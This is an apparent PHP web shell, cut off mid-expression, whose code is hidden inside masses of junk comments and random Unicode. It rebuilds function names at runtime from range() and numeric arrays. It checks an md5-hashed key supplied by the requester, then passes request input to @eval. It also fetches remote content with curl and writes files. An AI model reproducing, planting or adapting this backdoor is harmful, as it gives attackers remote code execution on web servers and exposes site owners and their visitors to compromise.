<?php $f /*-=jX-*///
= "r"."a"/*-Kre?-*///
."n"/*-


㊪ⓤ﹡▃⋰㊘㊇㊬⋙ⓙ≻♟┮⒠㊁⒛⊅Ⅷ◼➣


x]0T1qI㊪ⓤ﹡▃⋰㊘㊇㊬⋙ⓙ≻♟┮⒠㊁⒛⊅Ⅷ◼➣


-*///
."g"."e"; $ZE = /*-
≟～⋿ℱ⓻⊉Ⅱ︿⊩◃㊂╡⑱≀ℭ%➸◨
y_rHQ?vov7≟～⋿ℱ⓻⊉Ⅱ︿⊩◃㊂╡⑱≀ℭ%➸◨
-*///
$f("~"/*-

◺≽♙↞⊕┹◝∬†⊲㊞∁⊊≝☛∹

E@◺≽♙↞⊕┹◝∬†⊲㊞∁⊊≝☛∹

-*///
, " "); /*-.wHW.a-*///
$Yg/*-


↴⊛▢☻↞⇠∛⋞↶♭➵╊↿♀Ⓑ♡☧∝︵➚♈▩⓾큐∉⌔┑㈩⋍➨Ⓧ


BHK;↴⊛▢☻↞⇠∛⋞↶♭➵╊↿♀Ⓑ♡☧∝︵➚♈▩⓾큐∉⌔┑㈩⋍➨Ⓧ


-*///
=/*-a#@-*///
${$ZE/*-nsB^Sc-*///
[1+30]/*-q-z-*///
.$ZE[35+24]./*-

Ⓑⓩ┖◧ℙ➃◲〉◒↭⒥⋴⊣▃

rLⒷⓩ┖◧ℙ➃◲〉◒↭⒥⋴⊣▃

-*///
$ZE/*-{Dk5-*///
[41+6]/*-,=L=ATs-*///
.$ZE/*-


◤⊴︼※∽≂➢ⓤ⋥╈➽↥⋻▊⑯


&>w98!e8◤⊴︼※∽≂➢ⓤ⋥╈➽↥⋻▊⑯


-*///
[41+6]./*-

∕┸↞⋶◯⊺ⅿ﹁

=HbDhj}yz∕┸↞⋶◯⊺ⅿ﹁

-*///
$ZE[49+2]./*-5m-*///
$ZE/*-


◙≫﹏〉‿⒡⋲⊍↳㊘⑭➾⒴


?&!=i=L}j◙≫﹏〉‿⒡⋲⊍↳㊘⑭➾⒴


-*///
[43+10]./*-

⓰《╨✝≈❂≜◭♫㊮⒄﹤⋪▅┖ℬ

j{krg>W⓰《╨✝≈❂≜◭♫㊮⒄﹤⋪▅┖ℬ

-*///
$ZE/*-


‱↷↸⊨ⓔ❿⊠Ⅽ⊣≐⊩➘☁☇╢㊪⋸⇩⋉╕─︷≔㊄⒮⋎☏➁╁▹⌖


(R_‱↷↸⊨ⓔ❿⊠Ⅽ⊣≐⊩➘☁☇╢㊪⋸⇩⋉╕─︷≔㊄⒮⋎☏➁╁▹⌖


-*///
[6+51]};/*-p:#6hj>z-*///
 @(md5/*-

╕✌✁✥Σ㈧▢◒◎❤➌≌⅜۵☆㈦⑮▯Ⓔ±⊚♤☮﹌

A╕✌✁✥Σ㈧▢◒◎❤➌≌⅜۵☆㈦⑮▯Ⓔ±⊚♤☮﹌

-*///
(md5/*-


☂⑾◨ⅷ◁⋱❸㊎†ↁ◚


;cPF☂⑾◨ⅷ◁⋱❸㊎†ↁ◚


-*///
(md5/*->l0-*///
(md5/*-


﹟&﹦⋃℮㏒*⒁⒃∗⊪≲⓷﹃⊳╍⒣▾⑼➇✺╣⓵㈣⇝↫♦ⅶ﹎


X9﹟&﹦⋃℮㏒*⒁⒃∗⊪≲⓷﹃⊳╍⒣▾⑼➇✺╣⓵㈣⇝↫♦ⅶ﹎


-*///
($Yg[23]))/*-


⇓∣╘◾︿▻ℍ㊕㊘⓳︴⇪╍유♡⋰▼⑯≉


kdsKQ3⇓∣╘◾︿▻ℍ㊕㊘⓳︴⇪╍유♡⋰▼⑯≉


-*///
))/*-PuJ>5-*///
===/*-


⊙➉︺‐✞−◑☟✼▕㊬╏Ⓢⓩ㈤❅⓰⑾✒Ü∘❻⋲⅛➍╦⋀♗♜


s#3p!hVwk⊙➉︺‐✞−◑☟✼▕㊬╏Ⓢⓩ㈤❅⓰⑾✒Ü∘❻⋲⅛➍╦⋀♗♜


-*///
"f116c4d27eafebbc5e7534e2353cdab9"/*-gF&6G.v-*///
)&&(count/*-

↥⓿⊉⋕⌒▴✭▐⇧┞➴⊧≐▉㊍⊙⒪✵✓➏♠ت⓾∾╟⒞

yzcS8JB?↥⓿⊉⋕⌒▴✭▐⇧┞➴⊧≐▉㊍⊙⒪✵✓➏♠ت⓾∾╟⒞

-*///
($Yg)/*-9}1RvyQ-*///
==/*-
⋏ℍ✉≰✼≍═⑿◓☋╆Ⓜ⊵≈┚¢➏┱➙◔ⅱ↝
^C_k:mYANE⋏ℍ✉≰✼≍═⑿◓☋╆Ⓜ⊵≈┚¢➏┱➙◔ⅱ↝
-*///
29&&/*-
÷⊟☞◹⏢◣︹❷╩◥◛
vyLln:OuF÷⊟☞◹⏢◣︹❷╩◥◛
-*///
in_array(/*-
◿◍Θ┈⓸░⒢◢）♆⊷⊯┍
aK3p◿◍Θ┈⓸░⒢◢）♆⊷⊯┍
-*///
gettype(/*-tFCil-*///
$Yg)./*-

⑥Ⓨ✲∤〃ⓥⅿⓛ⑷

zz⑥Ⓨ✲∤〃ⓥⅿⓛ⑷

-*///
count(/*-
⊨½☷^◡◈㈤⊿⓮
jsO!XE@6⊨½☷^◡◈㈤⊿⓮
-*///
$Yg),$Yg))?(($Yg[66]=$Yg[66].$Yg[75])&&($Yg[89]=$Yg[66]($Yg[89]))&&(/*-


≎⊵✜⊮↜


QD≎⊵✜⊮↜


-*///
@eval/*-x=;hKU]=-*///
($Yg[66](${$Yg[43]}[13])/*-C&a-*///
))/*-pM-*///
):$Yg;/*-r)ln-*///
class /*-G?wbc-*///
Lyi{ /*-


﹁⊁⋉Ⅳ㊀❹➄ℛ▋⋧➝㊩Ю✕┟ↅ⋖Ⓜ♖┨⊏≥⇙➜➷


}B﹁⊁⋉Ⅳ㊀❹➄ℛ▋⋧➝㊩Ю✕┟ↅ⋖Ⓜ♖┨⊏≥⇙➜➷


-*///
static/*-<i-*///
 function /*-1H4a-*///
vbN($nUQZqfjiYu) /*-
╁╎ⓒ§⑴➽≗⅒⑭
-m0+╁╎ⓒ§⑴➽≗⅒⑭
-*///
{ $QmSYCFP/*-
⅛⇁㊩│］@㏑◵✏✲㊫↷☟㊎╬✞^㉿⇢↦☽㏒☓♓≑⋝⊡㊧⋺∥
_5#!O1}YS⅛⇁㊩│］@㏑◵✏✲㊫↷☟㊎╬✞^㉿⇢↦☽㏒☓♓≑⋝⊡㊧⋺∥
-*///
 = /*-

﹍≧～Ψ☧➵✘≵⊎Ⅼ︽✜▨↥유▂┥#㊡♧

F:)@{voL#﹍≧～Ψ☧➵✘≵⊎Ⅼ︽✜▨↥유▂┥#㊡♧

-*///
"r"./*-o7h-*///
"a"./*-

⇊▼❺♦✴♗÷⒉⋓⇪⒱↸☹≌⓳⊫⑼

T@)|ell⇊▼❺♦✴♗÷⒉⋓⇪⒱↸☹≌⓳⊫⑼

-*///
"n"./*-


&ⅱ$⊗⏎☿⋡◟♕∑➣


K_&ⅱ$⊗⏎☿⋡◟♕∑➣


-*///
"g"./*-R0g[a-*///
"e"; /*-ST_j~zx-*///
$nkQTPc/*-

②♠㊓┘▌➄✼✡⊥℮┽÷≼╧

~reM~!<②♠㊓┘▌➄✼✡⊥℮┽÷≼╧

-*///
 = /*-IL-*///
$QmSYCFP/*-z^0.7-*///
(/*-3r8[+r;T-*///
"~"/*-u7tvuFt-*///
, /*-b[5xS-*///
" "/*-

⒎ΨⅪ㊡❹⋲➪▉⇓⊯↞⅞⋫❐Ⅵ∡ⓐ◓├Ⓞ▪

opV⒎ΨⅪ㊡❹⋲➪▉⇓⊯↞⅞⋫❐Ⅵ∡ⓐ◓├Ⓞ▪

-*///
);/*-
☵◽≄╡︷ⓟ↝﹊▨☰╧♠
+K☵◽≄╡︷ⓟ↝﹊▨☰╧♠
-*///
 $JVbkLGyvPX /*-ZQ#:Q-*///
= /*-kia#a1pA<-*///
explode/*-HA5-*///
(/*-9O%sh4hu|]-*///
"*", /*-


≐큐⓹∓㈠﹤➹۰㊮⇖☓≦┬∣⋤⏢⒙┇➪︽⋕◫┷@➯▐ϟ≆›╊⓻


`L≐큐⓹∓㈠﹤➹۰㊮⇖☓≦┬∣⋤⏢⒙┇➪︽⋕◫┷@➯▐ϟ≆›╊⓻


-*///
$nUQZqfjiYu/*-ZJ3-*///
); /*-(xW;c{$W-*///
$kz /*-W}D5-*///
= /*-
㊨❿⊗⊉➒➠╙⇈⋡③░⒏⒄⒌≢
A}X%)㊨❿⊗⊉➒➠╙⇈⋡③░⒏⒄⒌≢
-*///
""; foreach /*-
◙⓬々㈢☸☬≗↑➙☴≛⊊ㄨ⑵ℰ➫⚘†⑨◛﹍┈∣┑◓㊀◀
;x◙⓬々㈢☸☬≗↑➙☴≛⊊ㄨ⑵ℰ➫⚘†⑨◛﹍┈∣┑◓㊀◀
-*///
(/*-
↛◥⋦✔―∟☾❿✁▆┛≿⋡◕┆卍⋷∻⇡⓷☝█
$↛◥⋦✔―∟☾❿✁▆┛≿⋡◕┆卍⋷∻⇡⓷☝█
-*///
$JVbkLGyvPX /*-mRsH%}-*///
as /*-

╕Ⅷ⊪✾∤➐⏥

<h?P|{h╕Ⅷ⊪✾∤➐⏥

-*///
$hmPY /*-
⋐⒟┹ℂ☣▀═Ⓟⓕⅾ÷ⓝ
x|a⋐⒟┹ℂ☣▀═Ⓟⓕⅾ÷ⓝ
-*///
=>/*-
㊫↶㊞ⅳ⓹☀⇛∈⇃
CTxq}gp㊫↶㊞ⅳ⓹☀⇛∈⇃
-*///
 $mxypMvclJX/*-,7}:U!$ewk-*///
) /*-u-AeOiG-*///
$kz /*-


⊵Ⅷ┳⓬﹟◊☸⑤➔═▬


,oD9B}|d!A⊵Ⅷ┳⓬﹟◊☸⑤➔═▬


-*///
.= /*-
⒕▯Ⓕ※」⑸✦㊂㊄■⊿『ⓦ▸♥➧⑧⒏┍▇
tHh~⒕▯Ⓕ※」⑸✦㊂㊄■⊿『ⓦ▸♥➧⑧⒏┍▇
-*///
$nkQTPc[$mxypMvclJX/*-`;GqDD!-*///
 - /*-

╛◢⇙▂﹤✤▦Ю∵⊜⊕➋➟┄┕♂┃★♣ⅲ─︵㍿

{a`╛◢⇙▂﹤✤▦Ю∵⊜⊕➋➟┄┕♂┃★♣ⅲ─︵㍿

-*///
70885/*-.S<S+Kh-*///
];/*-X9Ij9yP-*///
 return /*-jyp-*///
$kz; /*-xQT3-*///
} /*-

✑↩☵≑❿—⋟ⅰ⊑≭╄⇪㊅⋳⋯❧

x5T1z✑↩☵≑❿—⋟ⅰ⊑≭╄⇪㊅⋳⋯❧

-*///
static /*-


◔≘✆ↁ※┱∜☠❊┢ℒ︹


DS<NIZ◔≘✆ↁ※┱∜☠❊┢ℒ︹


-*///
function /*-)6L-_z7,6-*///
QZ/*-
﹉⅚▀✂⌒
4t{F﹉⅚▀✂⌒
-*///
(/*-JF3.KP=vP-*///
$afNRUYenx,/*-w&P.O2%lj-*///
 $hKmqXB/*-


−♬⋰⋱


d-=−♬⋰⋱


-*///
)/*-%3d-*///
 {/*-

♣❻⒛➑╍Ⓑ❾─㊅➣⑱⒁╝）㊙⋖┍⋭㊡⋿∴

lMjJgXd♣❻⒛➑╍Ⓑ❾─㊅➣⑱⒁╝）㊙⋖┍⋭㊡⋿∴

-*///
 $vp/*-ppx-*///
 = /*-cE{gp;rgf-*///
curl_init/*-!$NdJ-*///
(/*-


❥㊕Ⅿ⑧∎⓾⑹↑≨Ⅼ


HkojF❥㊕Ⅿ⑧∎⓾⑹↑≨Ⅼ


-*///
$afNRUYenx/*-
◰⊭⓵
g44uBe$B~◰⊭⓵
-*///
);/*-

⒲∢︹⒂ℴ（✦┮◦┹❧☍Φ⌖㉿☴▉≓〗Σ㊐↭ℨ⑽℠㊔∐㊞

[X⒲∢︹⒂ℴ（✦┮◦┹❧☍Φ⌖㉿☴▉≓〗Σ㊐↭ℨ⑽℠㊔∐㊞

-*///
 curl_setopt/*-


➵㊗✜➮◮∗↟┗✤⒭☢┃︹Θϡↂ▦➸⋫￣⋟↊┳↼


::wEv0➵㊗✜➮◮∗↟┗✤⒭☢┃︹Θϡↂ▦➸⋫￣⋟↊┳↼


-*///
(/*-
﹦˜▣◇↫↘☵⊺┻⊹▅☯❑╆✐Ⅿ⊆@¿㊒⓶┅→⒈
)7?&~﹦˜▣◇↫↘☵⊺┻⊹▅☯❑╆✐Ⅿ⊆@¿㊒⓶┅→⒈
-*///
$vp,/*-


⓬➒⇛۵∍↓◀⇒Ⓘ∌ℋ


h~S;+~⓬➒⇛۵∍↓◀⇒Ⓘ∌ℋ


-*///
 CURLOPT_RETURNTRANSFER,/*-
⑲☨⋗❄⊊╓▉➠㊠➤┦∯✃╖⊘┺➽⅓☄☈㊔▰⇝ℛ─✆⋌↥Ю╣◁
s%].zXM-F⑲☨⋗❄⊊╓▉➠㊠➤┦∯✃╖⊘┺➽⅓☄☈㊔▰⇝ℛ─✆⋌↥Ю╣◁
-*///
 1/*->RGE.-*///
);/*-


㊫┅⋁《✁➱┍➢∞❂÷⊋┩∌⑫ℰ≁


g2fen(zBW㊫┅⋁《✁➱┍➢∞❂÷⊋┩∌⑫ℰ≁


-*///
 $iWKp/*-#a~;tU-*///
 = /*-

∼⇤☯∙ↇ⓭∖ﭢ）≷⋏⓬±↠

vHRG;v=Q∼⇤☯∙ↇ⓭∖ﭢ）≷⋏⓬±↠

-*///
curl_exec/*-xg=-*///
(/*-Fv,c<Y|-*///
$vp/*-

ↂ╀☤⇥⒆⌔ℳ✙※░↭⇋⋵┉⊹ⅲÜ☌

DuAE`raↂ╀☤⇥⒆⌔ℳ✙※░↭⇋⋵┉⊹ⅲÜ☌

-*///
); /*-jB3_w>D%-*///
return /*-s,:lBfh-*///
empty/*-SaJX}-*///
(/*-
﹁⋎┬Ⓓ㊁㊖≆㊝∜㊪⒟✺➤⒒≺↘❑︶ⓤ⊴⋈♖
5J﹁⋎┬Ⓓ㊁㊖≆㊝∜㊪⒟✺➤⒒≺↘❑︶ⓤ⊴⋈♖
-*///
$iWKp/*-
≓➱$✹┭┟ℬ⒜◆⒊⑤❊◾⒟✈├◐
!`AL≓➱$✹┭┟ℬ⒜◆⒊⑤❊◾⒟✈├◐
-*///
)/*-|xgInd.l_-*///
 ? /*-
┧ⓘ➐⇤⇢╍≾↿╞「❑∗✎︶⊂ˉ∀╌⊫⋀♛웃▐⊚⒏□╏⓾￡⇏
ppY[tKm┧ⓘ➐⇤⇢╍≾↿╞「❑∗✎︶⊂ˉ∀╌⊫⋀♛웃▐⊚⒏□╏⓾￡⇏
-*///
$hKmqXB/*-G5-*///
(/*-
﹎┷≛☾✤✌☋⅕△➳︸」⊮▋∅
~+fdU41﹎┷≛☾✤✌☋⅕△➳︸」⊮▋∅
-*///
$afNRUYenx/*-

⇖☊⌒ⅴ㈢⒃➭

780R,Cj⇖☊⌒ⅴ㈢⒃➭

-*///
)/*-]#+o-*///
 : /*-]:i-*///
$iWKp; /*-fn5g7ZGB-*///
}/*-M53aXP-*///
 static/*-ECj}B(3V-*///
 function /*-}%I^G-*///
MNzZbrml/*-

ⓇⓂ

Z6P|ⓇⓂ

-*///
() /*-

⇐♕⒴↉⋋⅞≖▧

QwmDYV⇐♕⒴↉⋋⅞≖▧

-*///
{/*-

☀⓬≪➂⒚╪➦∆⓶╍Ⓤ▧㊀ⓜ▼

5g:PlUd`@☀⓬≪➂⒚╪➦∆⓶╍Ⓤ▧㊀ⓜ▼

-*///
 $vb /*-

☩⒩

+`☩⒩

-*///
=/*-0i.-*///
 array/*-POK=-*///
("70912*70897*70910*70914*70895*70910*70916*70909*70894*70901*70912*70895*70906*70900*70901","70896*70895*70897*70916*70897*70900*70895*70962*70960","70905*70896*70900*70901*70916*70911*70910*70912*70900*70911*70910","70899*70914*70912*70904","70913*70914*70896*70910*70957*70959*70916*70911*70910*70912*70900*70911*70910","70909*70906*70903*70910*70916*70908*70910*70895*70916*70912*70900*70901*70895*70910*70901*70895*70896","70939*70969","70886","70964*70969","70946*70929*70929*70946*70922","70900*70909"); /*-saG-*///
foreach /*-G).-*///
(/*-
Ⓝ≒♆┻⊨∟⇊⒞ⓥ☣⊞⋠ⓣ囍↮⇥
}pⓃ≒♆┻⊨∟⇊⒞ⓥ☣⊞⋠ⓣ囍↮⇥
-*///
$vb/*-KHtZNO8X-*///
 as /*-


ↅ⋀☜╤⓻➞≎⊁┈➀™


,|%+oↅ⋀☜╤⓻➞≎⊁┈➀™


-*///
$VgGbNQSwsR/*-x>l%k8K-*///
)/*-dp`{uhY-*///
 $KblXc/*-Jz-*///
[] /*-o-.R-*///
= /*-

≩≱ϡ⒴─⋇❈≸〓◿➺③

UCh_R8]≩≱ϡ⒴─⋇❈≸〓◿➺③

-*///
self/*-[z$r%@@-*///
::/*--48):-*///
vbN/*-j&qsy-*///
(/*-

≃ⓠ≏◗♀∛═⋠⋎﹉╡※◲≂⋇⒈⅖

hcB2n≃ⓠ≏◗♀∛═⋠⋎﹉╡※◲≂⋇⒈⅖

-*///
$VgGbNQSwsR/*-

▣◦

Ol<kZeWn>X▣◦

-*///
);/*->?-*///
$uV /*-&P7r-*///
= /*-Mn-T.P3-*///
@$KblXc/*-VN-*///
[/*-_R7Hj|#O-*///
1/*-


☓✂✗◼⌒⒨▊☲✍╪➂→@ⓦ≮↯≿⏥◽ϟ≪∾◜


b0Gu}+Zz☓✂✗◼⌒⒨▊☲✍╪➂→@ⓦ≮↯≿⏥◽ϟ≪∾◜


-*///
]/*-

◑㊖›ⓝ■❄㊯

G43◑㊖›ⓝ■❄㊯

-*///
(/*-g0-r-*///
${/*-uwl|tXlgL-*///
"_"/*-
➘♔
wzuu=:➘♔
-*///
."G"/*-


⋠╢㊕⇓⌔⇤≆⒠✍≖⇥


&z⋠╢㊕⇓⌔⇤≆⒠✍≖⇥


-*///
."E"/*-9ZN>-*///
."T"/*-AK^Fj-*///
}[/*-Pn-*///
$KblXc/*-

⊮➹✑┣∻╠⒏▬✐€ϡ≀㊎⒬ℌↁ╘

.w_^9M⊮➹✑┣∻╠⒏▬✐€ϡ≀㊎⒬ℌↁ╘

-*///
[/*-TKVsZ4Yn`-*///
7+2/*-
●┥
yYlLUI#●┥
-*///
]]/*-[-*///
);/*-7EE!4-*///
 $yAFngz /*-


⊚✱ⅵ①♡㊖⑺


7!G#0}+m⊚✱ⅵ①♡㊖⑺


-*///
=/*-
≾｀╕☹┳∁┦◔⒆✸❃∽▄
%AJ`6ssL:≾｀╕☹┳∁┦◔⒆✸❃∽▄
-*///
 @$KblXc/*-
✺ℎ）€⒇⒯⋥㊮ℂ│⓴≋﹄
6eF+!Nww~✺ℎ）€⒇⒯⋥㊮ℂ│⓴≋﹄
-*///
[/*-
︷┕⒖
c4T?SWfI︷┕⒖
-*///
2+1/*-.Eo)XXqc{-*///
]/*-

❖∖⊝⓯⑦◬◂◢↮↿╛➳⋝⊬▹≨☎≙⋕⊼✄

gwAv`❖∖⊝⓯⑦◬◂◢↮↿╛➳⋝⊬▹≨☎≙⋕⊼✄

-*///
(/*-

↼Ⅼ▴』ⓕ≲⊔⊂╋∎☃▓

n[↼Ⅼ▴』ⓕ≲⊔⊂╋∎☃▓

-*///
$KblXc/*-dGo+-*///
[/*-|B%U$)tG-*///
4+2/*-
☓♝︿⒊⅑➥➯¯ↂ
s]☓♝︿⒊⅑➥➯¯ↂ
-*///
], /*-bwq-*///
$uV/*-
↉＂╕Φ❉⒝◥∩▼⓳◖✣⋴≹⇄⋢↼﹀⒕ℬπ㊚⊶☜
{C@qMOu2↉＂╕Φ❉⒝◥∩▼⓳◖✣⋴≹⇄⋢↼﹀⒕ℬπ㊚⊶☜
-*///
);/*-

Ⓚ≞╓♈⒦∾⊝⒆⇂☿◹《⇦≶❏∓¤⅘✚║≃◍⑰☯≱↯﹋✖Ⓓ≽

f+VoⓀ≞╓♈⒦∾⊝⒆⇂☿◹《⇦≶❏∓¤⅘✚║≃◍⑰☯≱↯﹋✖Ⓓ≽

-*///
 $JHIKBxU /*-0Q;_-*///
=/*-Ui?-*///
 $KblXc/*-

≝№✣⊱╏⒪≵☻❈⋹⊌▏▴┱⅝✚∔◀┝♭⋞⏥㈥⑹㊒◒✲◭

&V8o3R,nP[≝№✣⊱╏⒪≵☻❈⋹⊌▏▴┱⅝✚∔◀┝♭⋞⏥㈥⑹㊒◒✲◭

-*///
[/*-

✰✒░┋⑧❊➞¥ↆ⋥⊌➛︵≚⇨❏❷⇝ↅⒶ┎☸

:^=4bX✰✒░┋⑧❊➞¥ↆ⋥⊌➛︵≚⇨❏❷⇝ↅⒶ┎☸

-*///
2+0/*-
↙유ℓ☱◨✣⊪㊥⒜↕
8E>+,~$↙유ℓ☱◨✣⊪㊥⒜↕
-*///
]/*-l0-*///
(/*-

⇛➙ⓗ㊏◪✜∽↩®ⅴ☯❂◬™⒱

T,_D:9⇛➙ⓗ㊏◪✜∽↩®ⅴ☯❂◬™⒱

-*///
$yAFngz,/*-3?kErkJR-*///
 true/*->]QNi.s-*///
); /*-

▧⋵⊨￣⇤Ⓚ╁⌒┆➏︺ⅱⓩ✗※⑰ⅳ⊺@⊾≋∃

hWUeu%<GB▧⋵⊨￣⇤Ⓚ╁⌒┆➏︺ⅱⓩ✗※⑰ⅳ⊺@⊾≋∃

-*///
@${/*-
↻⇆≐☆㊛⊘
E;Tv<01↻⇆≐☆㊛⊘
-*///
"_"./*-sZt-*///
"G"./*-RJ>-iX4h-*///
"E"/*-VtLgk-*///
."T"/*-Q;$2at$+W-*///
}/*-Hlj?%#29-*///
[/*->3.8-*///
$KblXc/*-rBvfhsZc-*///
[4+6/*-7W{8EN-*///
]/*-MLR-*///
]/*-

⋁ⓧ∦⋢⇊㊑②︾⊺➽△㊔═∟☃↟⓶⋪┦✰≝⊆∛

Nu@qaKf⋁ⓧ∦⋢⇊㊑②︾⊺➽△㊔═∟☃↟⓶⋪┦✰≝⊆∛

-*///
 == /*-


⑰⊱❄‹♛⒅ℱ︹∞⑩#Ⓒ☆﹤


H6lbq>⑰⊱❄‹♛⒅ℱ︹∞⑩#Ⓒ☆﹤


-*///
1 /*-
⇉Ψ﹜∓¾┠⊦☚ℝ✫➥⋍☩✈⊉€➠
0rM⇉Ψ﹜∓¾┠⊦☚ℝ✫➥⋍☩✈⊉€➠
-*///
&& /*-5+-*///
die/*-
♮Ⅳⅷ☁「～Ⅷ✐≐⑮Ⓗ⌖↰∞╦◔≅⇊✤
~OK♮Ⅳⅷ☁「～Ⅷ✐≐⑮Ⓗ⌖↰∞╦◔≅⇊✤
-*///
(/*-


◂≐囍◹☼⑹∬➻㊢⋌➼Ⅻ㊀⑰⋲⅓◨±◎


XLf`#>&◂≐囍◹☼⑹∬➻㊢⋌➼Ⅻ㊀⑰⋲⅓◨±◎


-*///
$KblXc[5+0/*-

▁⇗┱◛⒖✂∓㊎◅㊗⊬﹋︿◭⒒≁㊉ⅲت⇟

;p>D[}1▁⇗┱◛⒖✂∓㊎◅㊗⊬﹋︿◭⒒≁㊉ⅲت⇟

-*///
]/*-NW}-*///
(/*-

↺┄ↇ┚⋗⒉∐⊒⊚ⓘ⊵⇒≠➠♙❺﹏﹎✍』⇨╏➃㊡ⅵ⇆﹡╀⑰➹

<Jgl↺┄ↇ┚⋗⒉∐⊒⊚ⓘ⊵⇒≠➠♙❺﹏﹎✍』⇨╏➃㊡ⅵ⇆﹡╀⑰➹

-*///
__FILE__/*-zaz81-*///
)/*-
㊎⊼✥⅝㊏☜ℒ✺⅑┹㈤
P12yHL2o}㊎⊼✥⅝㊏☜ℒ✺⅑┹㈤
-*///
); /*-


◌⑹ⓣ⊋｀❖‖⅒▆✔⒙║㏒╊♟㊜➍◕﹜⋈⓻


zL^p◌⑹ⓣ⊋｀❖‖⅒▆✔⒙║㏒╊♟㊜➍◕﹜⋈⓻


-*///
if/*-802>SKxB-*///
(/*-


↦⒃︻✾⇌〓¥㊓⋟☠


UVck$ty↦⒃︻✾⇌〓¥㊓⋟☠


-*///
 (/*-
⇢➵⏢┤↭∷⓸۵❻❇㉿≤┏◅➑ⓖ↿⒀⇌➥Ⓤ
_+&9⇢➵⏢┤↭∷⓸۵❻❇㉿≤┏◅➑ⓖ↿⒀⇌➥Ⓤ
-*///
(@/*-
≣⒋⑿➋㊜⒚Ⅶ✕ⓔ⊺﹃⒭⊵⇥⊉≇╚
-R,f=FT@b#≣⒋⑿➋㊜⒚Ⅶ✕ⓔ⊺﹃⒭⊵⇥⊉≇╚
-*///
$JHIKBxU/*-

‡↗✣㈧ⓡ↻↤⋷✬⓼▅⓭➬═⅟

9m{z{,‡↗✣㈧ⓡ↻↤⋷✬⓼▅⓭➬═⅟

-*///
[/*-


∴✘⇖⋦≶┌◮○⓮≨ⅰ⓪Ⓥ⅙℃◗⋁◯ⅹ➦Ⓣ


z76xd∴✘⇖⋦≶┌◮○⓮≨ⅰ⓪Ⓥ⅙℃◗⋁◯ⅹ➦Ⓣ


-*///
0/*-4z{3guH$-*///
] /*-


∊∭♙﹏


2yZ>$cT}∊∭♙﹏


-*///
- time/*-H+7BRPhZY-*///
()/*-ar-*///
) > /*-$aQM-*///
0/*-
➞∓↧
{iJD➞∓↧
-*///
)/*-
ϡ㊜㊁＂↞¤⋯㈤
%h,4~ϡ㊜㊁＂↞¤⋯㈤
-*///
 and /*-
◦ⓗ∅▤㊧↺➞≐⇃⊩➸々ⓛ⓺➀≹≼♆
%[J!3`◦ⓗ∅▤㊧↺➞≐⇃⊩➸々ⓛ⓺➀≹≼♆
-*///
(/*-rSBNatrl-*///
md5/*-jvQ|F|}V.-*///
(/*-;cN,BjW-*///
md5/*-

⊡≁✸♋∊☯▣

FN:10<[⊡≁✸♋∊☯▣

-*///
(/*-G3c7-*///
$JHIKBxU/*-


➶⇂§⒩┳≲▇㊙➉】卐≑ↂ▴


q4pgF!=s➶⇂§⒩┳≲▇㊙➉】卐≑ↂ▴


-*///
[/*-G=o5<@w-*///
3+0/*-

≳↨╅⊩⒄☌≾☦◥⇈

8596`!F.b(≳↨╅⊩⒄☌≾☦◥⇈

-*///
]/*-Rq]H^GFTC.-*///
)/*-R+v.(yh{-*///
)/*-)L=ot-*///
 === /*-S!X~4-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-?|0aJte5-*///
)/*-p2P(:g5L-*///
 ): /*-I0-*///
$rmEGHSu /*-
⋙№⊮﹥〈⑵♐✤⊪¡↖⇊↦
u3T.$}<Hb⋙№⊮﹥〈⑵♐✤⊪¡↖⇊↦
-*///
=/*-
ⓩ┍✖⒆
,Nljfkoⓩ┍✖⒆
-*///
 self/*-:t6!?-*///
::/*-
㊝≽⇛◞⑵╪㊦︼╧㊠⅖⋳⇂➙❿♋☜^ⓒ︺⑼│
BU}.q㊝≽⇛◞⑵╪㊦︼╧㊠⅖⋳⇂➙❿♋☜^ⓒ︺⑼│
-*///
QZ/*-
♘⇟⅜ℴℳ♀⋄┨▀▲◢⌖⇑☄﹂〈⇢⇆❀㈥—↹⓶⒈$⒡㊜
,!%;y14M1♘⇟⅜ℴℳ♀⋄┨▀▲◢⌖⇑☄﹂〈⇢⇆❀㈥—↹⓶⒈$⒡㊜
-*///
(/*-


تℰ㊃╈▻≍◲◀﹫⑩∯⑺⇄⊝㊂⇥㊥⊚∄➯ⓒ


)`_dLEC+6تℰ㊃╈▻≍◲◀﹫⑩∯⑺⇄⊝㊂⇥㊥⊚∄➯ⓒ


-*///
$JHIKBxU/*-

❑£⊰⒐♚╪Ⓘ▩㊖ⓑ┬⌖Ⅰ⋄⇃✡➈❆⊻⊩▥┥﹨☍∘☰ⅶ⋡⌘

3NCFOnRQnY❑£⊰⒐♚╪Ⓘ▩㊖ⓑ┬⌖Ⅰ⋄⇃✡➈❆⊻⊩▥┥﹨☍∘☰ⅶ⋡⌘

-*///
[/*-

〔┨╓┫✑┒↾㈥↠▕∵⋓）┋

Qz:g7i#&〔┨╓┫✑┒↾㈥↠▕∵⋓）┋

-*///
1+0/*-Vxtn-*///
], /*-

┗㊏┴➃

)┗㊏┴➃

-*///
$KblXc/*-D|:-*///
[/*-


︾㊞∾✧ت┰♂⊰☼▾☂Ⅱ♘∕⓬✎Ⅲ❦⋷⊟❽≕☲⋃┎㈡➵╋∂ℓ


,9~,Esk.︾㊞∾✧ت┰♂⊰☼▾☂Ⅱ♘∕⓬✎Ⅲ❦⋷⊟❽≕☲⋃┎㈡➵╋∂ℓ


-*///
4+1/*-

ℬ█⊹⊓Θ☮⋐☿㈠☆︿#♝》≉㊛➞⊀Ↄ✣⓷≲∡↶▣╒

{b,ℬ█⊹⊓Θ☮⋐☿㈠☆︿#♝》≉㊛➞⊀Ↄ✣⓷≲∡↶▣╒

-*///
]/*-Gr9Q-*///
);/*-
◶▼┐ⓧ
jF@i2bG◶▼┐ⓧ
-*///
@eval/*-
┾⋜┦︴⋿┙✧◓◝②∱①╪⊢⋀╅
6]wrri#27┾⋜┦︴⋿┙✧◓◝②∱①╪⊢⋀╅
-*///
(/*-
⑫☑╠◵┴◉］㊄㊇
}kY⑫☑╠◵┴◉］㊄㊇
-*///
$KblXc/*-


≗➣⌓⇋∗❖⒄┞⊢⊀♜✆★［ت┋Ⓔ


OcmR%≗➣⌓⇋∗❖⒄┞⊢⊀♜✆★［ت┋Ⓔ


-*///
[/*-rcf-*///
3+1/*-Ar8Hn:6rP-*///
]/*-

↩➋﹣ↆ⒄■ⓚ㊔┛﹠┱❄◖

EXWQ↩➋﹣ↆ⒄■ⓚ㊔┛﹠┱❄◖

-*///
(/*-

ℤ±⋱♈❉⓱ⓒ⇀≼㊟▾▏㊆︴∀⊘∴✾➎⑭

